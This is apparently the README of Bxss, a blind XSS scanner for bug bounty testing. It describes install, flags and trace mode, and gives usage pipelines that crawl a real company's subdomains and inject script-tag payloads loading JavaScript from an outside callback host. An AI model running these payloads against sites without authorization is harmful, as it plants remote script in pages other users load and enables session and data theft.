Bxss - Blind XSS Scanner

---

🚀 Description

Bxss is a high-performance Blind XSS scanner that automates the detection of blind XSS vulnerabilities in web applications.

---

✨ Features

• Injects Blind XSS payloads into custom headers & parameters
• Supports multiple HTTP methods (PUT, POST, GET, OPTIONS)
• High-speed scanning with concurrency support
• Easily chainable with other tools
• Simple installation and usage

---

🧪 Experimental Features

• Trace mode (experimental)

---

📦 Installation

go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

---

⚙️ Arguments

Argument	Description	Default
-a	Append the payload to the parameter	false
-c int	Set the concurrency level	30
-H string	Set a custom header	""
-hf string	Path to file with headers	""
-p string	The blind XSS payload	""
-pf string	Path to file with payloads	""
-t	Test parameters for blind XSS	false
-X string	HTTP method to use	""
-v	Enable debug mode	false
-rl float	Rate limit (requests per second)	0
-f	Follow redirects	false
-l	Enable Trace Mode (experimental)	false

---

🎬 Demonstration

---

📝 What is Trace mode?

Trace mode is an experimental feature that allows you to track where the BlindXSS got triggered, some third party BlindXSS platforms such as https://xss.report/ allows you to specify custom parameters in you're payloads, this allows you to track where the BlindXSS got triggered, for example if you specify the parameter url=https://somehost.com in your payload, the tool will use the payload

'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

for testing and upon a trigger you will be able to inspect the DOM and see what host the BlindXSS got triggered from.

Make sure when assigning custom parameters in you're dashboard that you assign url={LINK} so bxss can automatically replace {LINK} with the actual URL.

🔥 Usage Examples

Parameters

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

Append To Parameters

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

Both Headers & Parameters

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

X-Forwarded-For Header

subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

Custom Headers & Parameters

echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Google Dorks With Dorki

curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

Custom Headers & Parameters With Rate Limit

echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

For advanced dorking and vulnerability exploration, check out Dorki and sign up today!

---

☕ Support the Project

If you get a bounty using this tool, consider supporting by buying me a coffee!